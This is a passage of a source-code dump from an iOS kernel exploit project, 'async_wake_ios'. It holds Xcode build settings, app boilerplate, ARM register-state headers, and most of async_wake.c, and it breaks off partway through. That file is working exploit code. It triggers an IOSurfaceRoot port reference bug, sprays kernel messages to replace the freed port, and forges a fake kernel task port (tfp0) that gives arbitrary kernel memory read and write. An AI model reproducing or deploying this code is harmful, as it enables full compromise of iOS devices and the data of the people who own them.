GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 319 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 320 | GCC_WARN_UNDECLARED_SELECTOR = YES; 321 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 322 | GCC_WARN_UNUSED_FUNCTION = YES; 323 | GCC_WARN_UNUSED_VARIABLE = YES; 324 | IPHONEOS_DEPLOYMENT_TARGET = 11.1; 325 | MTL_ENABLE_DEBUG_INFO = NO; 326 | SDKROOT = iphoneos; 327 | VALIDATE_PRODUCT = YES; 328 | }; 329 | name = Release; 330 | }; 331 | B07A02501FB09B6F0018ACE5 /* Debug */ = { 332 | isa = XCBuildConfiguration; 333 | buildSettings = { 334 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 335 | CODE_SIGN_STYLE = Automatic; 336 | DEVELOPMENT_TEAM = V6K7HPC3NH; 337 | INFOPLIST_FILE = async_wake_ios/Info.plist; 338 | IPHONEOS_DEPLOYMENT_TARGET = 11.0; 339 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 340 | OTHER_LDFLAGS = ( 341 | "-framework", 342 | IOKit, 343 | ); 344 | PRODUCT_BUNDLE_IDENTIFIER = "com.example.async-wake-ios1"; 345 | PRODUCT_NAME = "$(TARGET_NAME)"; 346 | TARGETED_DEVICE_FAMILY = "1,2"; 347 | }; 348 | name = Debug; 349 | }; 350 | B07A02511FB09B6F0018ACE5 /* Release */ = { 351 | isa = XCBuildConfiguration; 352 | buildSettings = { 353 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 354 | CODE_SIGN_STYLE = Automatic; 355 | DEVELOPMENT_TEAM = V6K7HPC3NH; 356 | INFOPLIST_FILE = async_wake_ios/Info.plist; 357 | IPHONEOS_DEPLOYMENT_TARGET = 11.0; 358 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 359 | OTHER_LDFLAGS = ( 360 | "-framework", 361 | IOKit, 362 | ); 363 | PRODUCT_BUNDLE_IDENTIFIER = "com.example.async-wake-ios1"; 364 | PRODUCT_NAME = "$(TARGET_NAME)"; 365 | TARGETED_DEVICE_FAMILY = "1,2"; 366 | }; 367 | name = Release; 368 | }; 369 | /* End XCBuildConfiguration section */ 370 | 371 | /* Begin XCConfigurationList section */ 372 | B07A02341FB09B6F0018ACE5 /* Build configuration list for PBXProject "async_wake_ios" */ = { 373 | isa = XCConfigurationList; 374 | buildConfigurations = ( 375 | B07A024D1FB09B6F0018ACE5 /* Debug */, 376 | B07A024E1FB09B6F0018ACE5 /* Release */, 377 | ); 378 | defaultConfigurationIsVisible = 0; 379 | defaultConfigurationName = Release; 380 | }; 381 | B07A024F1FB09B6F0018ACE5 /* Build configuration list for PBXNativeTarget "async_wake_ios" */ = { 382 | isa = XCConfigurationList; 383 | buildConfigurations = ( 384 | B07A02501FB09B6F0018ACE5 /* Debug */, 385 | B07A02511FB09B6F0018ACE5 /* Release */, 386 | ); 387 | defaultConfigurationIsVisible = 0; 388 | defaultConfigurationName = Release; 389 | }; 390 | /* End XCConfigurationList section */ 391 | }; 392 | rootObject = B07A02311FB09B6F0018ACE5 /* Project object */; 393 | } 394 | -------------------------------------------------------------------------------- /async_wake_ios/AppDelegate.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface AppDelegate : UIResponder 4 | 5 | @property (strong, nonatomic) UIWindow *window; 6 | 7 | 8 | @end 9 | 10 | -------------------------------------------------------------------------------- /async_wake_ios/AppDelegate.m: -------------------------------------------------------------------------------- 1 | #import "AppDelegate.h" 2 | #include "async_wake.h" 3 | 4 | @interface AppDelegate () 5 | 6 | @end 7 | 8 | @implementation AppDelegate 9 | 10 | 11 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 12 | // Override point for customization after application launch. 13 | //go(); 14 | return YES; 15 | } 16 | 17 | 18 | - (void)applicationWillResignActive:(UIApplication *)application { 19 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 20 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 21 | } 22 | 23 | 24 | - (void)applicationDidEnterBackground:(UIApplication *)application { 25 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 26 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 27 | } 28 | 29 | 30 | - (void)applicationWillEnterForeground:(UIApplication *)application { 31 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 32 | } 33 | 34 | 35 | - (void)applicationDidBecomeActive:(UIApplication *)application { 36 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 37 | } 38 | 39 | 40 | - (void)applicationWillTerminate:(UIApplication *)application { 41 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 42 | } 43 | 44 | 45 | @end 46 | -------------------------------------------------------------------------------- /async_wake_ios/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | }, 88 | { 89 | "idiom" : "ios-marketing", 90 | "size" : "1024x1024", 91 | "scale" : "1x" 92 | } 93 | ], 94 | "info" : { 95 | "version" : 1, 96 | "author" : "xcode" 97 | } 98 | } -------------------------------------------------------------------------------- /async_wake_ios/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /async_wake_ios/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /async_wake_ios/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | CFBundleInfoDictionaryVersion 12 | 6.0 13 | CFBundleName 14 | $(PRODUCT_NAME) 15 | CFBundlePackageType 16 | APPL 17 | CFBundleShortVersionString 18 | 1.0 19 | CFBundleVersion 20 | 1 21 | LSRequiresIPhoneOS 22 | 23 | UILaunchStoryboardName 24 | LaunchScreen 25 | UIMainStoryboardFile 26 | Main 27 | UIRequiredDeviceCapabilities 28 | 29 | armv7 30 | 31 | UISupportedInterfaceOrientations 32 | 33 | UIInterfaceOrientationPortrait 34 | UIInterfaceOrientationLandscapeLeft 35 | UIInterfaceOrientationLandscapeRight 36 | 37 | UISupportedInterfaceOrientations~ipad 38 | 39 | UIInterfaceOrientationPortrait 40 | UIInterfaceOrientationPortraitUpsideDown 41 | UIInterfaceOrientationLandscapeLeft 42 | UIInterfaceOrientationLandscapeRight 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /async_wake_ios/ViewController.h: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | @interface ViewController : UIViewController 4 | 5 | @property (weak, nonatomic) IBOutlet UILabel *tfp; 6 | 7 | @end 8 | 9 | -------------------------------------------------------------------------------- /async_wake_ios/ViewController.m: -------------------------------------------------------------------------------- 1 | #import "ViewController.h" 2 | #include 3 | #include "async_wake.h" 4 | 5 | @interface ViewController () 6 | 7 | @end 8 | 9 | @implementation ViewController 10 | 11 | - (void)viewDidLoad { 12 | [super viewDidLoad]; 13 | // Do any additional setup after loading the view, typically from a nib. 14 | self.tfp.text = [NSString stringWithFormat:@"tfp: %x", go()]; 15 | } 16 | 17 | 18 | - (void)didReceiveMemoryWarning { 19 | printf("******* received memory warning! ***********\n"); 20 | [super didReceiveMemoryWarning]; 21 | // Dispose of any resources that can be recreated. 22 | } 23 | 24 | 25 | @end 26 | -------------------------------------------------------------------------------- /async_wake_ios/arm64_state.h: -------------------------------------------------------------------------------- 1 | #ifndef arm64_state_h 2 | #define arm64_state_h 3 | 4 | /* 5 | * GPR context 6 | */ 7 | 8 | struct arm_saved_state32 { 9 | uint32_t r[13]; /* General purpose register r0-r12 */ 10 | uint32_t sp; /* Stack pointer r13 */ 11 | uint32_t lr; /* Link register r14 */ 12 | uint32_t pc; /* Program counter r15 */ 13 | uint32_t cpsr; /* Current program status register */ 14 | uint32_t far; /* Virtual fault address */ 15 | uint32_t esr; /* Exception syndrome register */ 16 | uint32_t exception; /* Exception number */ 17 | }; 18 | typedef struct arm_saved_state32 arm_saved_state32_t; 19 | 20 | struct arm_saved_state32_tagged { 21 | uint32_t tag; 22 | struct arm_saved_state32 state; 23 | }; 24 | typedef struct arm_saved_state32_tagged arm_saved_state32_tagged_t; 25 | 26 | #define ARM_SAVED_STATE32_COUNT ((mach_msg_type_number_t) \ 27 | (sizeof (arm_saved_state32_t)/sizeof(unsigned int))) 28 | 29 | struct arm_saved_state64 { 30 | uint64_t x[29]; /* General purpose registers x0-x28 */ 31 | uint64_t fp; /* Frame pointer x29 */ 32 | uint64_t lr; /* Link register x30 */ 33 | uint64_t sp; /* Stack pointer x31 */ 34 | uint64_t pc; /* Program counter */ 35 | uint32_t cpsr; /* Current program status register */ 36 | uint32_t reserved; /* Reserved padding */ 37 | uint64_t far; /* Virtual fault address */ 38 | uint32_t esr; /* Exception syndrome register */ 39 | uint32_t exception; /* Exception number */ 40 | }; 41 | typedef struct arm_saved_state64 arm_saved_state64_t; 42 | 43 | #define ARM_SAVED_STATE64_COUNT ((mach_msg_type_number_t) \ 44 | (sizeof (arm_saved_state64_t)/sizeof(unsigned int))) 45 | 46 | struct arm_saved_state { 47 | arm_state_hdr_t ash; 48 | union { 49 | struct arm_saved_state32 ss_32; 50 | struct arm_saved_state64 ss_64; 51 | } uss; 52 | } __attribute__((aligned(16))); 53 | #define ss_32 uss.ss_32 54 | #define ss_64 uss.ss_64 55 | 56 | typedef struct arm_saved_state arm_saved_state_t; 57 | 58 | /* 59 | * NEON context 60 | */ 61 | typedef __uint128_t uint128_t; 62 | typedef uint64_t uint64x2_t __attribute__((ext_vector_type(2))); 63 | typedef uint32_t uint32x4_t __attribute__((ext_vector_type(4))); 64 | 65 | struct arm_neon_saved_state32 { 66 | union { 67 | uint128_t q[16]; 68 | uint64_t d[32]; 69 | uint32_t s[32]; 70 | } v; 71 | uint32_t fpsr; 72 | uint32_t fpcr; 73 | }; 74 | typedef struct arm_neon_saved_state32 arm_neon_saved_state32_t; 75 | 76 | #define ARM_NEON_SAVED_STATE32_COUNT ((mach_msg_type_number_t) \ 77 | (sizeof (arm_neon_saved_state32_t)/sizeof(unsigned int))) 78 | 79 | struct arm_neon_saved_state64 { 80 | union { 81 | uint128_t q[32]; 82 | uint64x2_t d[32]; 83 | uint32x4_t s[32]; 84 | } v; 85 | uint32_t fpsr; 86 | uint32_t fpcr; 87 | }; 88 | typedef struct arm_neon_saved_state64 arm_neon_saved_state64_t; 89 | 90 | #define ARM_NEON_SAVED_STATE64_COUNT ((mach_msg_type_number_t) \ 91 | (sizeof (arm_neon_saved_state64_t)/sizeof(unsigned int))) 92 | 93 | struct arm_neon_saved_state { 94 | arm_state_hdr_t nsh; 95 | union { 96 | struct arm_neon_saved_state32 ns_32; 97 | struct arm_neon_saved_state64 ns_64; 98 | } uns; 99 | }; 100 | typedef struct arm_neon_saved_state arm_neon_saved_state_t; 101 | #define ns_32 uns.ns_32 102 | #define ns_64 uns.ns_64 103 | 104 | struct arm_context { 105 | struct arm_saved_state ss; 106 | struct arm_neon_saved_state ns; 107 | }; 108 | typedef struct arm_context arm_context_t; 109 | 110 | #define ARM_SAVED_STATE64 0x15 111 | 112 | #define ARM_DEBUG_STATE64 15 113 | const uint64_t ACT_DEBUGDATA_OFFSET = 0x438; 114 | 115 | struct arm64_debug_state 116 | { 117 | __uint64_t bvr[16]; 118 | __uint64_t bcr[16]; 119 | __uint64_t wvr[16]; 120 | __uint64_t wcr[16]; 121 | __uint64_t mdscr_el1; /* Bit 0 is SS (Hardware Single Step) */ 122 | }; 123 | 124 | struct arm_debug_aggregate_state { 125 | arm_state_hdr_t dsh; 126 | struct arm64_debug_state ds64; 127 | } __attribute__((aligned(16))); 128 | 129 | 130 | 131 | #endif 132 | -------------------------------------------------------------------------------- /async_wake_ios/async_wake.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | 13 | #include 14 | 15 | #include 16 | 17 | #include "async_wake.h" 18 | #include "kmem.h" 19 | #include "find_port.h" 20 | #include "kutils.h" 21 | #include "symbols.h" 22 | #include "early_kalloc.h" 23 | #include "kcall.h" 24 | #include "kdbg.h" 25 | 26 | // various prototypes and structure definitions for missing iOS headers: 27 | 28 | kern_return_t mach_vm_read( 29 | vm_map_t target_task, 30 | mach_vm_address_t address, 31 | mach_vm_size_t size, 32 | vm_offset_t *data, 33 | mach_msg_type_number_t *dataCnt); 34 | 35 | /****** IOKit/IOKitLib.h *****/ 36 | typedef mach_port_t io_service_t; 37 | typedef mach_port_t io_connect_t; 38 | 39 | extern const mach_port_t kIOMasterPortDefault; 40 | #define IO_OBJECT_NULL (0) 41 | 42 | kern_return_t 43 | IOConnectCallAsyncMethod( 44 | mach_port_t connection, 45 | uint32_t selector, 46 | mach_port_t wakePort, 47 | uint64_t* reference, 48 | uint32_t referenceCnt, 49 | const uint64_t* input, 50 | uint32_t inputCnt, 51 | const void* inputStruct, 52 | size_t inputStructCnt, 53 | uint64_t* output, 54 | uint32_t* outputCnt, 55 | void* outputStruct, 56 | size_t* outputStructCntP); 57 | 58 | kern_return_t 59 | IOConnectCallMethod( 60 | mach_port_t connection, 61 | uint32_t selector, 62 | const uint64_t* input, 63 | uint32_t inputCnt, 64 | const void* inputStruct, 65 | size_t inputStructCnt, 66 | uint64_t* output, 67 | uint32_t* outputCnt, 68 | void* outputStruct, 69 | size_t* outputStructCntP); 70 | 71 | io_service_t 72 | IOServiceGetMatchingService( 73 | mach_port_t _masterPort, 74 | CFDictionaryRef matching); 75 | 76 | CFMutableDictionaryRef 77 | IOServiceMatching( 78 | const char* name); 79 | 80 | kern_return_t 81 | IOServiceOpen( 82 | io_service_t service, 83 | task_port_t owningTask, 84 | uint32_t type, 85 | io_connect_t* connect ); 86 | 87 | 88 | /******** end extra headers ***************/ 89 | 90 | mach_port_t user_client = MACH_PORT_NULL; 91 | 92 | // make_dangling will drop an extra reference on port 93 | // this is the actual bug: 94 | void make_dangling(mach_port_t port) { 95 | kern_return_t err; 96 | 97 | uint64_t inputScalar[16]; 98 | uint32_t inputScalarCnt = 0; 99 | 100 | char inputStruct[4096]; 101 | size_t inputStructCnt = 0x18; 102 | 103 | uint64_t* ivals = (uint64_t*)inputStruct; 104 | ivals[0] = 1; 105 | ivals[1] = 2; 106 | ivals[2] = 3; 107 | 108 | uint64_t outputScalar[16]; 109 | uint32_t outputScalarCnt = 0; 110 | 111 | char outputStruct[4096]; 112 | size_t outputStructCnt = 0; 113 | 114 | mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); 115 | 116 | uint64_t reference[8] = {0}; 117 | uint32_t referenceCnt = 1; 118 | 119 | for (int i = 0; i < 2; i++) { 120 | err = IOConnectCallAsyncMethod( 121 | user_client, 122 | 17, // s_set_surface_notify 123 | port, 124 | reference, 125 | referenceCnt, 126 | inputScalar, 127 | inputScalarCnt, 128 | inputStruct, 129 | inputStructCnt, 130 | outputScalar, 131 | &outputScalarCnt, 132 | outputStruct, 133 | &outputStructCnt); 134 | 135 | printf("%x\n", err); 136 | }; 137 | 138 | err = IOConnectCallMethod( 139 | user_client, 140 | 18, // s_remove_surface_notify 141 | inputScalar, 142 | inputScalarCnt, 143 | inputStruct, 144 | inputStructCnt, 145 | outputScalar, 146 | &outputScalarCnt, 147 | outputStruct, 148 | &outputStructCnt); 149 | 150 | printf("%x\n", err); 151 | } 152 | 153 | void prepare_user_client() { 154 | kern_return_t err; 155 | io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot")); 156 | 157 | if (service == IO_OBJECT_NULL){ 158 | printf(" [-] unable to find service\n"); 159 | exit(EXIT_FAILURE); 160 | } 161 | 162 | err = IOServiceOpen(service, mach_task_self(), 0, &user_client); 163 | if (err != KERN_SUCCESS){ 164 | printf(" [-] unable to get user client connection\n"); 165 | exit(EXIT_FAILURE); 166 | } 167 | 168 | printf("got user client: 0x%x\n", user_client); 169 | } 170 | 171 | mach_port_t* prepare_ports(int n_ports) { 172 | mach_port_t* ports = malloc(n_ports * sizeof(mach_port_t)); 173 | for (int i = 0; i < n_ports; i++) { 174 | kern_return_t err; 175 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); 176 | if (err != KERN_SUCCESS) { 177 | printf(" [-] failed to allocate port\n"); 178 | exit(EXIT_FAILURE); 179 | } 180 | } 181 | return ports; 182 | } 183 | 184 | void free_ports(mach_port_t* ports, int n_ports) { 185 | for (int i = 0; i < n_ports; i++) { 186 | mach_port_t port = ports[i]; 187 | if (port == MACH_PORT_NULL) { 188 | continue; 189 | } 190 | 191 | mach_port_destroy(mach_task_self(), port); 192 | } 193 | } 194 | 195 | struct simple_msg { 196 | mach_msg_header_t hdr; 197 | char buf[0]; 198 | }; 199 | 200 | mach_port_t send_kalloc_message(uint8_t* replacer_message_body, uint32_t replacer_body_size) { 201 | // allocate a port to send the messages to 202 | mach_port_t q = MACH_PORT_NULL; 203 | kern_return_t err; 204 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &q); 205 | if (err != KERN_SUCCESS) { 206 | printf(" [-] failed to allocate port\n"); 207 | exit(EXIT_FAILURE); 208 | } 209 | 210 | mach_port_limits_t limits = {0}; 211 | limits.mpl_qlimit = MACH_PORT_QLIMIT_LARGE; 212 | err = mach_port_set_attributes(mach_task_self(), 213 | q, 214 | MACH_PORT_LIMITS_INFO, 215 | (mach_port_info_t)&limits, 216 | MACH_PORT_LIMITS_INFO_COUNT); 217 | if (err != KERN_SUCCESS) { 218 | printf(" [-] failed to increase queue limit\n"); 219 | exit(EXIT_FAILURE); 220 | } 221 | 222 | 223 | mach_msg_size_t msg_size = sizeof(struct simple_msg) + replacer_body_size; 224 | struct simple_msg* msg = malloc(msg_size); 225 | memset(msg, 0, sizeof(struct simple_msg)); 226 | memcpy(&msg->buf[0], replacer_message_body, replacer_body_size); 227 | 228 | for (int i = 0; i < 256; i++) { // was MACH_PORT_QLIMIT_LARGE 229 | msg->hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0); 230 | msg->hdr.msgh_size = msg_size; 231 | msg->hdr.msgh_remote_port = q; 232 | msg->hdr.msgh_local_port = MACH_PORT_NULL; 233 | msg->hdr.msgh_id = 0x41414142; 234 | 235 | err = mach_msg(&msg->hdr, 236 | MACH_SEND_MSG|MACH_MSG_OPTION_NONE, 237 | msg_size, 238 | 0, 239 | MACH_PORT_NULL, 240 | MACH_MSG_TIMEOUT_NONE, 241 | MACH_PORT_NULL); 242 | 243 | if (err != KERN_SUCCESS) { 244 | printf(" [-] failed to send message %x (%d): %s\n", err, i, mach_error_string(err)); 245 | exit(EXIT_FAILURE); 246 | } 247 | } 248 | 249 | return q; 250 | } 251 | 252 | /* 253 | for the given mach message size, how big will the ipc_kmsg structure be? 254 | 255 | This is defined in ipc_kmsg_alloc, and it's quite complicated to work it out! 256 | 257 | The size is overallocated so that if the message was sent from a 32-bit process 258 | they can expand out the 32-bit ool descriptors to the kernel's 64-bit ones, which 259 | means that for each descriptor they would need an extra 4 bytes of space for the 260 | larger pointer. Except at this point they have no idea what's in the message 261 | so they assume the worst case for all messages. This leads to approximately a 30% 262 | overhead in the allocation size. 263 | 264 | The allocated size also contains space for the maximum trailer plus the ipc_kmsg header. 265 | 266 | When the message is actually written into this buffer it's aligned to the end 267 | */ 268 | int message_size_for_kalloc_size(int kalloc_size) { 269 | return ((3*kalloc_size)/4) - 0x74; 270 | } 271 | 272 | 273 | /* 274 | build a fake task port object to get an arbitrary read 275 | 276 | I am basing this on the techniques used in Yalu 10.2 released by 277 | @qwertyoruiopz and @marcograss (and documented by Johnathan Levin 278 | in *OS Internals Volume III) 279 | 280 | There are a few difference here. We have a kernel memory disclosure bug so 281 | we know the address the dangling port pointer points to. This means we don't need 282 | to point the task to userspace to get a "what+where" primitive since we can just 283 | put whatever recursive structure we require in the object which will replace 284 | the free'd port. 285 | 286 | We can also leverage the fact that we have a dangling mach port pointer 287 | to also write to a small area of the dangling port (via mach_port_set_context) 288 | 289 | If we build the replacement object (with the fake struct task) 290 | correctly we can set it up such that by calling mach_port_set_context we can control 291 | where the arbitrary read will read from. 292 | 293 | this same method is used again a second time once the arbitrary read works so that the vm_map 294 | and receiver can be set correctly turning this into a fake kernel task port. 295 | */ 296 | 297 | uint32_t IO_BITS_ACTIVE = 0x80000000; 298 | uint32_t IKOT_TASK = 2; 299 | uint32_t IKOT_NONE = 0; 300 | 301 | uint64_t second_port_initial_context = 0x1024204110244201; 302 | 303 | uint8_t* build_message_payload(uint64_t dangling_port_address, uint32_t message_body_size, uint32_t message_body_offset, uint64_t vm_map, uint64_t receiver, uint64_t** context_ptr) { 304 | uint8_t* body = malloc(message_body_size); 305 | memset(body, 0, message_body_size); 306 | 307 | uint32_t port_page_offset = dangling_port_address & 0xfff; 308 | 309 | // structure required for the first fake port: 310 | uint8_t* fake_port = body + (port_page_offset - message_body_offset); 311 | 312 | 313 | *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS)) = IO_BITS_ACTIVE | IKOT_TASK; 314 | *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES)) = 0xf00d; // leak references 315 | *(uint32_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS)) = 0xf00d; // leak srights 316 | *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER)) = receiver; 317 | *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)) = 0x123456789abcdef; 318 | 319 | *context_ptr = (uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT)); 320 | 321 | 322 | // set the kobject pointer such that task->bsd_info reads from ip_context: 323 | int fake_task_offset = koffset(KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT) - koffset(KSTRUCT_OFFSET_TASK_BSD_INFO); 324 | 325 | uint64_t fake_task_address = dangling_port_address + fake_task_offset; 326 | *(uint64_t*)(fake_port+koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)) = fake_task_address; 327 | 328 | 329 | // when we looked for a port to make dangling we made sure it was correctly positioned on the page such that when we set the fake task 330 | // pointer up there it's actually all in the buffer so we can also set the reference count to leak it, let's double check that! 331 | 332 | if (fake_port + fake_task_offset < body) { 333 | printf("the maths is wrong somewhere, fake task doesn't fit in message\n"); 334 | sleep(10); 335 | exit(EXIT_FAILURE); 336 | } 337 | 338 | uint8_t* fake_task = fake_port + fake_task_offset; 339 | 340 | // set the ref_count field of the fake task: 341 | *(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT)) = 0xd00d; // leak references 342 | 343 | // make sure the task is active 344 | *(uint32_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_ACTIVE)) = 1; 345 | 346 | // set the vm_map of the fake task: 347 | *(uint64_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)) = vm_map; 348 | 349 | // set the task lock type of the fake task's lock: 350 | *(uint8_t*)(fake_task + koffset(KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE)) = 0x22; 351 | return body; 352 | } 353 | 354 | 355 | /* 356 | * the first tpf0 we get still hangs of the dangling port and is backed by a type-confused ipc_kmsg buffer 357 | * 358 | * use that tfp0 to build a safer one such that we can safely free everything this process created and exit 359 | * without leaking memory 360 | */ 361 | mach_port_t build_safe_fake_tfp0(uint64_t vm_map, uint64_t space) { 362 | kern_return_t err; 363 | 364 | mach_port_t tfp0 = MACH_PORT_NULL; 365 | err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &tfp0); 366 | if (err != KERN_SUCCESS) { 367 | printf("unable to allocate port\n"); 368 | } 369 | 370 | // build a fake struct task for the kernel task: 371 | //uint64_t fake_kernel_task_kaddr = kmem_alloc_wired(0x4000); 372 | uint64_t fake_kernel_task_kaddr = early_kalloc(0x1000); 373 | printf("fake_kernel_task_kaddr: %llx\n", fake_kernel_task_kaddr); 374 | 375 | 376 | void* fake_kernel_task = malloc(0x1000); 377 | memset(fake_kernel_task, 0, 0x1000); 378 | *(uint32_t*)(fake_kernel_task + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT)) = 0xd00d; // leak references 379 | *(uint32_t*)(fake_kernel_task + koffset(KSTRUCT_OFFSET_TASK_ACTIVE)) = 1; 380 | *(uint64_t*)(fake_kernel_task + koffset(KSTRUCT_OFFSET_TASK_VM_MAP)) = vm_map; 381 | *(uint8_t*)(fake_kernel_task + koffset(KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE)) = 0x22; 382 | kmemcpy(fake_kernel_task_kaddr, (uint64_t) fake_kernel_task, 0x1000); 383 | free(fake_kernel_task); 384 | 385 | uint32_t fake_task_refs = rk32(fake_kernel_task_kaddr + koffset(KSTRUCT_OFFSET_TASK_REF_COUNT)); 386 | printf("read fake_task_refs: %x\n", fake_task_refs); 387 | if (fake_task_refs != 0xd00d) { 388 | printf("read back value didn't match...\n"); 389 | } 390 | 391 | // now make the changes to the port object to make it a task port: 392 | uint64_t port_kaddr = find_port_address(tfp0, MACH_MSG_TYPE_MAKE_SEND); 393 | 394 | wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_BITS_ACTIVE | IKOT_TASK); 395 | wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES), 0xf00d); 396 | wk32(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS), 0xf00d); 397 | wk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), space); 398 | wk64(port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), fake_kernel_task_kaddr); 399 | 400 | // swap our receive right for a send right: 401 | uint64_t task_port_addr = task_self_addr(); 402 | uint64_t task_addr = rk64(task_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); 403 | uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE)); 404 | uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE)); 405 | 406 | uint32_t port_index = tfp0 >> 8; 407 | const int sizeof_ipc_entry_t = 0x18; 408 | uint32_t bits = rk32(is_table + (port_index * sizeof_ipc_entry_t) + 8); // 8 = offset of ie_bits in struct ipc_entry 409 | 410 | #define IE_BITS_SEND (1<<16) 411 | #define IE_BITS_RECEIVE (1<<17) 412 | 413 | bits &= (~IE_BITS_RECEIVE); 414 | bits |= IE_BITS_SEND; 415 | 416 | wk32(is_table + (port_index * sizeof_ipc_entry_t) + 8, 